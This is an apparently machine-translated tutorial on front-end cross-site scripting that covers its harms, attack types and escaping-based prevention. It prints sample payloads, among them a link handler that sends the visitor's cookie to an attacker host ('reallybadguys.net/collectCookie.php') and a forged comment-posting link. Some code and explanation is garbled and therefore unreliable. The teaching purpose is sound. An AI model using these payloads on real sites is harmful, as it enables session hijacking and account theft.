Front-end XSS attacks

What is XSS?

XSS Cross-site scripting attack, a computer security vulnerability that often appears in Web applications, refers to malicious attackers inserting malicious HTML code into a Web page, and when a user browses to the page, the embedded malicious HTML code is executed, Scripting. So as to achieve the special purpose of malicious users.
XSS is a passive attack, because it is passive and bad to use, so many people often ignore its harmfulness. But with the development of front-end technology, this problem is getting more and more attention. To give a simple example: if you are now a user on the SNS site, the ability to publish information has a vulnerability can be executed JS you enter a malicious script at this moment, alert (), then all the people who see your new information in the browser will execute this script pop-up prompt box. Of course, this is only pediatrics, if a more intense, the consequences will be very serious.
This attack process saw someone summing up a more intuitive diagram for understanding.

The harm of XSS attack

The hazards of XSS attacks include:

• Stealing all kinds of user accounts, such as machine login account, user network Bank account, all kinds of administrator account

• Control enterprise data, including the ability to read, tamper, add, and delete enterprise sensitive data

• Theft of important business-value information

• Illegal transfer

• Force send e-mail

• Website Hanging Horse

• Control the victim's machine to launch attacks on other websites
  Example:

<Bodybackground="Javascript:alert (' XSS webjiaocheng! ')" ><iframe src=javascript:alert (' XSS webjiaocheng! ') " ><body onload="A ();" ><script>function a() {alert (' XSS webjiaocheng! ') " ></script></body>         

Which XSS attacks

• Attacks from other sites to application sites: hence the name, this attack is initiated externally from an email or other site. This kind of attack when the user clicks the link, downloads the picture or submits the form, has carried on the intention to the application website operation.
  Usually a user is logged in to get a usable session,xss attacker can take advantage of this session, bypassing user authentication and doing some unsafe operations, as follows:

<a href = “http:// www.2cto.com /addComment.php?subject = I am owned” >    Check it out!</a>

With this link, as soon as the user logs in, a subject is sent, even on other websites.
Because of this, a generic mailbox client does not automatically load pictures from untrusted sites (because a GET request can be sent to a third-party site through the SRC attribute of img), and the session's expiration time can be set to expire automatically.

• Attacks from the application site to the same station or other sites: this attack, usually by commenting on the application site, or otherwise embedding the code, when the user loads the page or clicks on the link will produce some actions other than intended.
  As follows:

<a href=”#” onmouseover = “window.location =‘http://reallybadguys.net/collectCookie.php?cookie =‘ + documentcookie.escape();” >Check it out!</a>

When the user slips through the link, the cookie information is sent to the attacker's server.

See some of the information above is summarized in another way:

• A locally exploited vulnerability that exists in the client script itself on the page.
  The attack process is as follows:
  A to B sends a maliciously constructed web URL. b Click and view this URL.
  JavaScript in a malicious page opens a vulnerable HTML page and installs it on Bob's computer. The vulnerable HTML page contains javascript that executes on the local domain of computer B.
  A's malicious script can execute commands on Bob's computer under the permissions held by B.

• Reflection vulnerability
  This vulnerability is somewhat similar to type A, unlike when Web clients use server-side script generation pages to provide data to users if unauthenticated user data is included

The client code can be injected into a dynamic page without encoding the HTML entity in the page.

Prevention

As a front-end developer, we need to try to make our code strong enough and perfect enough, and as the development experience grows, I believe that the familiar technical areas of the anti-XSS attacks, there will be more and more in-depth understanding, the following only a few aspects, you can continue to expand this part of the content.

• For the name, description and other data, you need to pay extra attention to its source of data, in the self-test process, more input XSS exception data. Such as:

></script><iframe/onload=alert(2)>

such as XSS scripts. Facilitate the discovery of potential vulnerabilities.

• When using the innerHTML method in JS to modify the DOM, the data is escaped.

• When using some template languages, for example Freemarker, the portal file is available

<#escape x as x?html> ... </#escape>

Instruction package, which ensures that the template data between the instructions is escaped by default when the data is output. In some specific cases, it is not convenient to use < #escape > directives, where the output can be escaped, such as: The ${name?html},html method is both an escape instruction for FTL.

Front-end XSS attacks